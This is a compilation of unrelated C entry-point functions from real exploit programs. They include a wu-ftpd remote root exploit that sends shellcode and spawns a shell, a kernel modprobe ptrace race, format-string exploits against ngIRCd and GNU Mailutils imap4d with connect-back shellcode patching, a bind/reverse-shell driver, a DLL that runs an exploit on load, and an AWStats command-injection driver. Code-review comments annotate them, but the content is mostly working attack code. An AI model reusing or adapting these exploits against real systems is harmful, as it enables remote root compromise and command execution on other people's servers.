       /* Upward sweep finished: restart from esp() and sweep downward. */
       if(x>=3000)
       {
        ret=esp();
        x=-1;
       }
       else if(x<=3000&&x>=0)
       {
        ret+=offset;
        x+=offset;
       }
       else if(x>=-3000&&x<0)
       {
        ret-=offset;
        x-=offset;
       }
       printf("%d\n\n",x);
   }
  printf("brute force complete..\n\n");
  system("id");
}
/*
 * Format-string self-test harness: patches the address of shell() into the
 * global `shellcode` buffer at offset 1, builds a format string in the global
 * `formatstrings` that encodes RETLOC as four raw bytes followed by a
 * width-padded %p and a %n, copies it into a NOP-filled buffer and passes it
 * to new_function() and exploit(). shell, shellcode, formatstrings, NOP,
 * RETLOC, new_function() and exploit() are defined elsewhere.
 *
 * NOTE(review):
 *  - `(int) shell` and `(int )shellcode` truncate pointers on 64-bit
 *    builds; use uintptr_t / intptr_t.
 *  - sprintf() into `formatstrings` is unbounded; its size is not visible
 *    here, so whether `sizeof(formatstrings)` in the memcpy is an array
 *    size or a pointer size cannot be told from this block.
 *  - `len` is fixed at 256 regardless of how much of `code` was written.
 *  - main has no return statement.
 */
int main(int argc,char **argv)
{
        char code[1024];
        unsigned int len;

        *(int *)(shellcode+1)=(int) shell;
        memset(code,NOP,1024);

        len = 256;

        printf("shellcode addr is:%p\nshell addr is %p\n",shellcode,shell);
        sprintf(formatstrings,"%c%c%c%c%%%dp%%n",RETLOC&0x000000ff,(RETLOC&0x0000ff00)>>8,(RETLOC&0x00ff0000)>>16, (RETLOC&0xff000000)>>24,(int )shellcode -4);

        printf("%s",formatstrings);
        fflush(stdout);
        memcpy(code,formatstrings,sizeof(formatstrings));
        new_function(len,code);
        exploit(len,code);

}
/*
 * DLL entry point. On DLL_PROCESS_ATTACH it records the module handle in
 * the global hAppInstance, runs exploit() (defined elsewhere) and then
 * terminates the host process with ExitProcess(0), so the function never
 * returns in that case. DLL_QUERY_HMODULE is not a standard Windows
 * reason code; it is presumably defined by this project and lets a caller
 * retrieve hAppInstance through lpReserved.
 *
 * NOTE(review): running arbitrary work inside DllMain is discouraged by
 * the loader-lock rules; here it is moot because the process is exited.
 * From a detection standpoint, a library that calls ExitProcess from its
 * attach handler is itself a notable behaviour.
 */
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
    BOOL bReturnValue = TRUE;
	switch( dwReason ) 
    { 
		case DLL_QUERY_HMODULE:
			if( lpReserved != NULL )
				*(HMODULE *)lpReserved = hAppInstance;
			break;
		case DLL_PROCESS_ATTACH:
			hAppInstance = hinstDLL;
			exploit();
			ExitProcess(0);
			break;
		case DLL_PROCESS_DETACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
            break;
    }
	return bReturnValue;
}
/*
 * Entry point for a race against a kernel usermode helper. Outline:
 *  1. writes `shellcmd` into the file SHELL (mode 0755) after unlinking it;
 *  2. guesses the helper's pid as getpid()+2 and builds its
 *     /proc/<pid>/status path in `buf`;
 *  3. forks: the child maps FMAX copies of /dev/zero (to keep the helper
 *     busy per the comment), signals the parent, waits for SIGUSR1, then
 *     opens ENTRY non-blocking and exits;
 *  4. the parent waits for the child's signal, answers it, then polls the
 *     status file until get_ids() reports uid == euid == suid == fsuid,
 *     ptrace-attaches to the guessed pid, steps it with PTRACE_SYSCALL
 *     until regs.eip is non-zero and below MAXSTACK, and calls exploit(pid).
 * SHELL, shellcmd, TMPSIZE, FMAX, MMSIZE, ENTRY, MAXSTACK, sig, regs,
 * sighnd(), fatal(), get_ids(), exploit() are defined elsewhere.
 *
 * NOTE(review):
 *  - `while (!sig);` spins on a flag set from a signal handler; unless `sig`
 *    is declared volatile sig_atomic_t (not visible here) the compiler may
 *    hoist the load and never observe the change.
 *  - getpid()+2 is a pid guess; nothing verifies the attached process is
 *    the intended one beyond the uid equality test.
 *  - open(), fdopen(), mmap() and fd leaks in both loops are unchecked;
 *    `fd > 0` wrongly treats fd 0 as failure.
 *  - the fclose(fp) at the end of the inner loop is unreachable because
 *    every path out of `while (1)` calls fatal() or exit().
 */
int main(int ac, char **av)
{
    int fd, pid, p, i;
    char buf[TMPSIZE];
    struct uids uids;
    FILE *fp;


    setpgrp();
    setsid();
    umask(022);
    unlink(SHELL);
    fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);
    fp = fdopen(fd, "w+");
    fprintf(fp, "%s\n", shellcmd);
    fclose(fp);

    /* Assumed pid of the helper that the kernel will spawn next. */
    pid = getpid() + 2;
    snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid);
    printf("\nModprobe pid %d, my pid %d", pid, getpid());
    fflush(stdout);
    signal(SIGUSR1, sighnd);

//      fork modprobe helper
    if (!(p = fork())) {
//      some nice work for exec_usermodehelper(), keep it busy!
	for (i = 0; i < FMAX; i++) {
	    fd = open("/dev/zero", O_RDWR);
	    mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
	}
	kill(getppid(), SIGUSR1);
	while (!sig);
	printf("\nHelper (pid %d) requesting module...", getpid());
	fflush(stdout);
	fd = open(ENTRY, O_RDONLY | O_NONBLOCK);
	exit(0);
    }
//      synchronize with the child
    else {
	while (!sig);
	kill(p, SIGUSR1);

//      wait for modprobe to run at unprivileged level
	while (1) {
	    fd = open(buf, O_RDONLY);
	    if (fd > 0) {
		if (!(fp = fdopen(fd, "r")))
		    fatal("fdopen");
		/* All four ids must be equal (i.e. the process is unprivileged). */
		if (get_ids(fp, &uids) != 4
		    || (uids.uid != uids.euid || uids.uid != uids.suid
			|| uids.uid != uids.fsuid)) {
		    fatal("did not catch modprobe...try again later :-)");
		}
//      ok, it runs...
		while (1) {
		    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
			fatal("PTRACE_ATTACH failed!");
		    } else {
			i = 0;
			printf("\nAttached afterburner...\n");
			fflush(stdout);
			/* Step syscalls until a usable EIP below MAXSTACK is seen. */
			while (ptrace(PTRACE_GETREGS, pid, 0, &regs)
			       || !regs.eip || regs.eip >= MAXSTACK) {
			    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
			    printf("\rplease wait %d", i++);
			    fflush(stdout);
			}
			waitpid(pid, NULL, WUNTRACED);
			printf
			    ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ",
			     regs.eip);
			fflush(stdout);
			exploit(pid);
			exit(0);
		    }
		}
		fclose(fp);
	    }
	}
    }

    return 0;
}
/*
 * Entry point (7350wurm). Flow:
 *  - option parsing into file-scope globals (automode, debugmode, verbose,
 *    mass, username, password, dest, user_retloc, user_retaddr);
 *  - target selection: both -L and -A given -> the manual entry `tmanual`;
 *    otherwise -t must index the global `targets` table (1-based), or -a
 *    defers selection to tgt_frombanner() after login;
 *  - in mass mode (-m) the remaining argv is compiled into an execve
 *    payload by sc_build_x86_lnx();
 *  - ftp_login(), xp_gapfill(), exploit(fd, tgt), a "CWD ~{" trigger, and
 *    a check that the server echoes "sP"; then either the mass payload or
 *    x86_lnx_shell is sent and shell(fd) takes over.
 * All helpers, globals, constants and the tgt_type struct are defined
 * elsewhere.
 *
 * NOTE(review):
 *  - `char c` compared against EOF: on unsigned-char platforms the getopt
 *    loop never ends; getopt() returns int.
 *  - `tgt_num` is int but parsed with "%u"; its -1 default only avoids
 *    `&targets[-2]` because the `>=` comparison against a size_t converts
 *    -1 to a huge unsigned value and sends execution to tgt_list().
 *  - `case 'u'` assigns the literal "******" (this looks like corpus
 *    redaction rather than the original source) while printing optarg.
 *  - xpbuf is unsigned char but passed to strncmp(); write() and
 *    net_write() results are unchecked.
 */
int
main (int argc, char *argv[])
{
        char                    c;
        char *                  progname;       /* = argv[0] */
        int                     fd;

        tgt_type *              tgt = NULL;
        int                     tgt_num = -1;

        unsigned char           xpbuf[512 + 16];


        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
                "(version "VERSION")\n"
                "team teso (thx bnuts, tomas, synnergy.net !).\n\n");

        progname = argv[0];
        if (argc < 2)
                usage (progname);


        while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
                switch (c) {
                case 'h':
                        usage (progname);
                        break;
                case 'a':
                        automode = 1;
                        break;
                case 'D':
                        debugmode = 1;
                        break;
                case 'v':
                        verbose += 1;
                        break;
                case 'm':
                        mass = 1;
                        break;
                case 't':
                        if (sscanf (optarg, "%u", &tgt_num) != 1)
                                usage (progname);
                        break;
                case 'u':
                        username = "******";
                        printf ("username = %s\n", optarg);
                        break;
                case 'p':
                        password = optarg;
                        break;
                case 'd':
                        dest = optarg;
                        break;
                case 'L':
                        if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
                                usage (progname);
                        break;
                case 'A':
                        if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
                                usage (progname);
                        break;
                default:
                        usage (progname);
                        break;
                }
        }

        /* if both required offsets are given manually, then we dont have
         * to require a target selection. otherwise check whether the target
         * is within the list. if its not, then print a list of available
         * targets
         */
        if (user_retloc != 0 && user_retaddr != 0) {
                tgt = &tmanual;
        } else if (automode == 0 && (tgt_num == 0 ||
                tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
        {
                if (tgt_num != 0)
                        printf ("WARNING: target out of list. list:\n\n");

                tgt_list ();

                exit (EXIT_SUCCESS);
        }
        /* -t is 1-based for the user, 0-based in the table. */
        if (tgt == NULL && automode == 0)
                tgt = &targets[tgt_num - 1];

        if (mass == 1) {
                if ((argc - optind) == 0)
                        usage (progname);

                /* Remaining argv becomes the execve payload; length is capped at 0xfe. */
                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
                        x86_lnx_execve, &argv[optind]);

                if (mlen >= 0xff) {
                        fprintf (stderr, "created argv-code too long "
                                "(%d bytes)\n", mlen);

                        exit (EXIT_FAILURE);
                }

                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
        }

        printf ("# trying to log into %s with (%s/%s) ...", dest,
                username, password);
        fflush (stdout);

        fd = ftp_login (dest, username, password);
        if (fd <= 0) {
                fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
                exit (EXIT_FAILURE);
        }
        printf (" connected.\n");

        if (debugmode) {
                printf ("DEBUG: press enter\n");
                getchar ();
        }

        printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
                ftp_banner);

        /* Auto mode: pick the target from the server banner after login. */
        if (tgt == NULL && automode) {
                tgt = tgt_frombanner (ftp_banner);
                if (tgt == NULL) {
                        printf ("# failed to jield target from banner, aborting\n");

                        exit (EXIT_FAILURE);
                }
                printf ("# successfully selected target from banner\n");
        }

        if (shellcode == NULL) {
                shellcode = tgt->shellcode;
                shellcode_len = tgt->shellcode_len;
        }

        if (verbose >= 2) {
                printf ("using %lu byte shellcode:\n", shellcode_len);

                hexdump ("shellcode", shellcode, shellcode_len);
        }

        /* Only retloc is written into the target; retaddr is merely announced here. */
        if (user_retaddr != 0) {
                fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
                        user_retaddr);
        }

        if (user_retloc != 0) {
                fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
                        user_retloc);

                tgt->retloc = user_retloc;
        }

        printf ("\n### TARGET: %s\n\n", tgt->desc);

        /* real stuff starts from here
         */
        printf ("# 1. filling memory gaps\n");
        xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);

        exploit (fd, tgt);

        printf ("# 3. triggering free(globlist[1])\n");
        net_write (fd, "CWD ~{\n");

        /* Success is detected by the server echoing "sP" back. */
        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
        if (strncmp (xpbuf, "sP", 2) != 0) {
                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
                        xpbuf);

                exit (EXIT_FAILURE);
        }

        printf ("#\n# exploitation succeeded. sending real shellcode\n");

        if (mass == 1) {
                printf ("# mass mode, sending constructed argv code\n");

                write (fd, mcode, mlen);

                printf ("# send. sleeping 10 seconds\n");
                sleep (10);

                printf ("# success.\n");

                exit (EXIT_SUCCESS);
        }

        printf ("# sending setreuid/chroot/execve shellcode\n");
        net_write (fd, "%s", x86_lnx_shell);

        printf ("# spawning shell\n");
        printf ("##################################################"
                        "##########################\n");

        write (fd, INIT_CMD, strlen (INIT_CMD));
        shell (fd);

        exit (EXIT_SUCCESS);
}
/*
 * Entry point: resolves argv[1], connects to it on PORT and calls exploit()
 * with either a masked connect-back address/port (4 arguments; then
 * start_reverse_handler(argv[3])) or zeros and flag 1 (2 arguments; then
 * connect_to_bindshell(argv[1], 4444)). exploit() returns 1 on failure.
 * header(), exploit(), start_reverse_handler(), connect_to_bindshell(),
 * PORT, YELLOW and NORMAL are defined elsewhere.
 *
 * NOTE(review): atoi(argv[3]) is unvalidated; `( unsigned short ) NULL`
 * is a pointer-to-integer cast that only works by accident; system("clear")
 * spawns a shell for cosmetics; main has no return statement.
 */
int
main ( int argc, char* argv[] )
{

	int s;
	unsigned long xoredip;
	unsigned short xoredcbport;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

	/* Accept exactly 2 or 4 arguments. */
	if ( argc != 2 )
		if ( argc != 4 )
		{
			fprintf ( stderr, "\nUsage\n-----\n[ Bindshell    ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
			exit ( 1 );
		}

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
	{
		fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
		exit ( 1 );
	}
	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	system ( "clear" );
	header ();

	if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!\n" );
		exit ( 1 );
	}

	printf ( "--[ connecting to %s:%u...", argv[1], PORT  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!\n" );
		exit ( 1 );
	}
	printf ( YELLOW "done!\n" NORMAL);
	
	if ( argc == 4 )
	{
		/* Mask the connect-back address/port with fixed XOR keys. */
		xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
		{
			printf ( "exploitation FAILED!\n" );
			exit ( 1 );
		}
		start_reverse_handler ( argv[3] );
	}
	else
	{
		if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
		{
			printf ( "exploitation FAILED!\n" );
			exit ( 1 );
		}
		connect_to_bindshell ( argv[1], 4444 );
	}
}
/* Program entry point: the untouched command line is forwarded to exploit()
 * (defined elsewhere in this file).  The explicit `return 0;` spells out the
 * implicit C99 return of the original. */
int main(int argc, char **argv) {
  exploit(argc, argv);
  return 0;
}
/*
 * Entry point: parses -h/-g/-t/-l/-o/-b/-p, resolves the host, then calls
 * exploit(host, gotaddr, ret, ircdport) either once ("single mode") or in a
 * loop over candidate ret values when the file-scope flag b is set
 * ("bruteforce mode").  targets[], b, IRCD, use(), printlist() and exploit()
 * are defined outside this block.
 *
 * Reviewer notes (C correctness; none of these are fixed here):
 *  - `char opt` receives getopt()'s int result and is compared with EOF.
 *    On a platform where char is unsigned, -1 can never match and the loop
 *    does not terminate; getopt() is documented to return -1, not EOF.
 *  - `targetnum = atoi(optarg)-1` is used to index targets[] before any
 *    range check, so `-t 0` or a non-numeric argument reads targets[-1].
 *  - gotaddr, i and retaddr are ints printed with %010p, which expects a
 *    void *; mismatched format/argument types are undefined behaviour.
 *    `0x%08x` with an unsigned value is the well-defined spelling.
 *  - use() is presumably noreturn (the code continues as if it were) and
 *    the -l branch keeps parsing unless printlist() exits — confirm both.
 *  - atoi() and strtoul(..., NULL, 0) give no error indication.
 *  - main() falls off the end without a return; C99 defines that as return 0.
 */
int main(int argc, char *argv[])
{
char opt, *host=NULL, *system=NULL, *ircd=NULL;
int i, ircdport=IRCD;
int retaddr=0x0806b000, gotaddr=0, targetnum=0, offset=0;
struct hostent *he;

printf("\n ngIRCd <= 0.8.2 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");

/* NOTE: the local `system` shadows the libc function of the same name. */
while((opt = getopt(argc,argv,"h:g:t:lo:bp:")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'g':
/* Explicit GOT address overrides the target table. */
gotaddr = strtoul(optarg,NULL,0);
system = "unknown";
ircd = "unknown";
break;
case 't':
/* 1-based user index -> 0-based table index; no lower-bound check. */
targetnum = atoi(optarg)-1;
if(targets[targetnum].num) { 
system = targets[targetnum].os;
ircd = targets[targetnum].ircd;
gotaddr = targets[targetnum].got;
}
else use(argv[0]);
break;
case 'l':
printlist();
break;
case 'o':
/* Offset is applied to retaddr immediately; a later -o adds again. */
offset = atoi(optarg);
retaddr += offset;
break;
case 'b':
b = 1;
break;
case 'p':
ircdport = atoi(optarg);
break;
default:
use(argv[0]);
break;
}
}

if(host == NULL) use(argv[0]);
if(gotaddr == 0) use(argv[0]);
if(system == NULL) {
system = "unknown";
ircd = "unknown";
}

printf(" [*] host\t\t\t: %s\n", host);
printf(" [*] system\t\t\t: %s\n", system);
printf(" [*] ircd version\t\t: %s\n", ircd);
printf(" [*] syslog GOT address\t\t: %010p\n", gotaddr);
printf(" [*] verifying host\t\t:");
fflush(stdout);

if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}

printf(" %s\n\n", inet_ntoa(*((struct in_addr *)he->h_addr)));

/* bruteforce mode */
if(b) {
/* Every iteration calls exploit(); nothing here stops the loop on success,
 * so exploit() itself must exit or the loop runs to the upper bound. */
for(i = retaddr; i <= 0x0806ffff; i += 0x10) {
printf(" [*] bruteforcing RET address\t: %010p", i);
fflush(stdout);
exploit(host, gotaddr, i, ircdport);
}

printf("\n [*] failed!\n\n");
}

/* single mode */
else {
printf(" [*] trying RET address\t\t: %010p", retaddr);
fflush(stdout);
if(offset) printf(" (offset %d)\n", offset);
else printf("\n");
exploit(host, gotaddr, retaddr, ircdport);
}
}
/*
 * Entry point: parses -h/-p/-c/-b, optionally patches the connect-back
 * address and port into the file-scope buffer conn_back, resolves the target,
 * opens a TCP connection with connect_timeout(), then calls getinfo() and
 * exploit().  rhost, rport, cback, shsize, conn_back, IMAPD, ERROR, TIMEOUT,
 * use(), connect_timeout(), getinfo() and exploit() are defined outside this
 * block.
 *
 * Reviewer notes (C correctness; none of these are fixed here):
 *  - `char opt` receives getopt()'s int result and is compared with EOF.
 *    Where char is unsigned, -1 never matches and the loop does not
 *    terminate; getopt() is documented to return -1, not EOF.
 *  - imapdport is unsigned but filled from atoi(), so a negative or
 *    non-numeric -p wraps silently; rport via atoi() is likewise unchecked.
 *  - Writes to conn_back[33..40] assume the buffer is at least 41 bytes
 *    (TODO confirm against its definition).  The later
 *    `strlen(conn_back) < shsize` test is what detects a patched byte that
 *    turned out to be 0 and truncated the string.
 *  - The sockfd opened here is never closed on the error paths; exit()
 *    releases it, so this is cosmetic.
 *  - bzero() is legacy; memset(&dest_dir, 0, sizeof dest_dir) before filling
 *    the struct is the portable form.
 *  - main() falls off the end without a return; C99 defines that as return 0.
 */
int main(int argc, char *argv[]) { 
	char opt, *host=NULL, *rh=NULL;
	int sockfd;
	unsigned int imapdport=IMAPD;
	struct hostent *he;
	struct sockaddr_in dest_dir;

	printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n");
	printf(" by CoKi <*****@*****.**>\n\n");

	while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) {
		switch (opt) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				imapdport = atoi(optarg);
				break;
			case 'c':
				/* -c both records the address (rhost, via inet_addr(), unchecked)
				 * and its textual form (rh) for the later gethostbyname(). */
				rhost = inet_addr(optarg);
				rh = optarg;
				cback++;
				break;
			case 'b':
				rport = atoi(optarg);
				break;
			default:
				use(argv[0]);
				break;
		}
	}

	if(host == NULL) use(argv[0]);

	if(cback) {
		printf(" [*] verifying your host\t:");
		fflush(stdout);

		if((he=gethostbyname(rh)) == NULL) {
			herror(" gethostbyname()");
			printf("\n");
			exit(1);
		}

		/* Remember the unpatched length so the 0-byte check below has a baseline. */
		shsize = strlen(conn_back);

		/* rhost is in network byte order from inet_addr(); bytes are copied
		 * least-significant first into fixed offsets of conn_back. */
		conn_back[33]=(rhost & 0x000000ff);
		conn_back[34]=(rhost & 0x0000ff00) >> 8;
		conn_back[35]=(rhost & 0x00ff0000) >> 16;
		conn_back[36]=(rhost & 0xff000000) >> 24;

		conn_back[39]=(rport & 0xff00) >> 8;
		conn_back[40]=(rport & 0x00ff);

		printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
		printf(" [*] connect back port\t\t: %u\n", rport);
	}

	/* Only meaningful after the patch above; with cback == 0 and shsize at
	 * its file-scope default this comparison cannot be true. */
	if(strlen(conn_back) < shsize) {
		printf("\n [!] failed! your host or port contain null-bytes\n\n");
		exit(1);
	}

	printf(" [*] verifying target host\t:");

	/* `he` is reused here; the connect-back lookup result is discarded. */
	if((he=gethostbyname(host)) == NULL) {
		herror(" gethostbyname()");
		printf("\n");
		exit(1);
        }

	printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
	printf(" [*] target imapd port\t\t: %u\n\n", imapdport);

	printf(" [*] connecting...\t\t:");
	fflush(stdout);

	if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
		perror(" socket()");
		printf("\n");
		exit(1);
	}

	dest_dir.sin_family = AF_INET;
	dest_dir.sin_port = htons(imapdport);
	dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
	bzero(&(dest_dir.sin_zero), 8);

	if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
		sizeof(struct sockaddr), TIMEOUT) == ERROR) {

		printf(" closed\n\n");
		exit(1);
        }

	printf(" done!\n\n");

	/* Note: sockfd is not passed on; getinfo() and exploit() receive only
	 * host and port and presumably open their own connections — confirm. */
	getinfo(host, imapdport);

	exploit(host, imapdport);
}
/* Entry point with no argument handling: the whole run is delegated to
 * exploit(), which is defined elsewhere in this file.  `main()` without a
 * return type relies on pre-C99 implicit int, which C99 and later reject;
 * `int main(void)` is the portable spelling.  Falling off the end is a
 * return of 0 under C99. */
main()
{
	/*No args, no vectors*/
	exploit();
}
/*
 * Entry point: parses -u/-h/-i/-s/-p/-c/-o into host, ip, script name, CGI
 * path, command string and port, then calls exploit() with all six values.
 * usage() and exploit() are defined outside this block.
 *
 * Reviewer notes (C correctness; none of these are fixed here):
 *  - Off-by-one in the -c guard: the format " | %s | " adds 6 characters plus
 *    the terminating NUL, so exeCmd[1024] can hold at most 1017 bytes of
 *    optarg, but the check rejects only lengths > 1018.  An argument of
 *    exactly 1018 bytes makes sprintf() write one byte past the buffer.
 *    `snprintf(exeCmd, sizeof exeCmd, " | %s | ", optarg)` with a check of
 *    the returned length removes the hand-computed bound entirely.
 *  - The optstring starts with ':', so a missing option argument is
 *    reported as ':'; no case handles it and there is no default, so the
 *    error is silently dropped and parsing continues.
 *  - `isgood == 1` rejects only the case where exactly one of -h/-i was
 *    seen.  Giving neither (isgood 0) falls back to the defaults, and giving
 *    -h twice without -i (isgood 2) also passes.
 *  - Error paths call exit(0); a non-zero status would let callers tell
 *    failure from success.
 *  - The `extern` declarations of optarg/optind/optopt duplicate what
 *    <unistd.h> already provides.
 *  - atoi() on -o reports no parse errors.
 */
int main(int argc, char * argv[])
 {
 extern char *optarg;
 extern int optind, optopt;

 int  c,
      Xport 	= 80,
      isgood	= 0;

 char *Xhost	= "localhost" ,
      *Xip	= "127.0.0.1",
      *Xscript 	= "awstats.pl",
      *Xpath 	= "/cgi-bin";

 /* Default command string, overwritten in full by -c. */
 char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";

 while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1)
   {

     switch(c)
       {
	case 'h':
		Xhost = optarg;
		isgood++;
		break;

        case 'i':
		Xip = optarg;
		isgood++;
		break;

        case 's':
		Xscript = optarg;
		break;

        case 'p':
		Xpath = optarg;
		break;

        case 'c':
	 	/* Bound is one too large: 1018 + 6 format chars + NUL = 1025 > 1024. */
	 	if(strlen(optarg) > 1018)
		 {
		  printf("# `-c` argument can't exceed 1024 bytes (command to long)");
		  exit(0);
		 }
		sprintf(exeCmd, " | %s | ", optarg);
		break;

	case 'o':
		Xport = atoi(optarg);
		break;

        case 'u':
		/* usage() is assumed to exit; if it returns, parsing continues. */
		usage(argv[0]);
		break;

	case '?':
		printf("# Unknown option `-%c`\n", optopt);
		break;

	/* ':' (missing option argument) is not handled here. */

       }
   }


 /* Only the "exactly one of -h/-i" case is rejected; see notes above. */
 if( isgood == 1)
  {
   printf("# Please specify both host `-h` and ip `-i`\n");
   exit(0);
  }

 exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
 return 0;
 }